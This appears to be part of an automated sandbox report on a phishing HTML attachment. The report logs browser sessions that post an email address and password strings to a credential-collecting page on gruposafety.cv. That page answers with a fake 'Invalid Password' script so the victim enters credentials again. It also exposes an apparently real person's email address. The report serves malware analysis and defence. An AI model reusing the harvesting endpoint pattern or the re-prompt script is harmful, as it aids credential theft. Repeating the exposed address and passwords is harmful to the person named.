                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:53:37 UTC65OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 25 32 35 25 33 41 79 66 25 35 42 30 39 25 32 43 56 70
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=%25%3Ayf%5B09%2CVp
                            2025-01-01 21:53:38 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:52:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:53:38 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.450033130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:53:47 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.450035130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:54:00 UTC792OUTPOST /NPO/excelaccess.php HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            Content-Length: 68
                            Cache-Control: max-age=0
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            Origin: null
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-01 21:54:00 UTC68OUTData Raw: 65 6d 61 69 6c 3d 75 72 73 2e 6c 75 73 74 65 6e 62 65 72 67 65 72 25 34 30 6c 67 70 61 72 74 6e 65 72 2e 63 68 26 70 61 73 73 77 6f 72 64 3d 25 33 46 25 32 33 6d 25 32 38 36 38 70 38 65 67 51 64 42 53 30
                            Data Ascii: email=urs.lustenberger%40lgpartner.ch&password=%3F%23m%2868p8egQdBS0
                            2025-01-01 21:54:01 UTC304INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Wed, 01 Jan 2025 21:52:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/8.0.30
                            Access-Control-Allow-Origin: *
                            Strict-Transport-Security: max-age=15768000; includeSubDomains
                            X-Powered-By: PleskLin
                            2025-01-01 21:54:01 UTC125INData Raw: 37 32 0d 0a 3c 73 63 72 69 70 74 3e 61 6c 65 72 74 28 27 49 6e 76 61 6c 69 64 20 50 61 73 73 77 6f 72 64 2e 2e 20 50 6c 65 61 73 65 20 45 6e 74 65 72 20 50 61 73 73 77 6f 72 64 20 54 6f 20 41 63 63 65 73 73 20 20 44 6f 63 75 6d 65 6e 74 2e 27 29 3b 20 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 72<script>alert('Invalid Password.. Please Enter Password To Access Document.'); window.history.go(-1);</script>0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.450036130.185.81.1114434488C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-01 21:54:11 UTC603OUTGET /favicon.ico HTTP/1.1
                            Host: gruposafety.cv
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://gruposafety.cv/NPO/excelaccess.php
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:16:51:00
                            Start date:01/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\tmpAE4B.HTmL.html"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:2
                            Start time:16:51:03
                            Start date:01/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,7185164192713812909,7523031163983281264,262144 /prefetch:8
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            No disassembly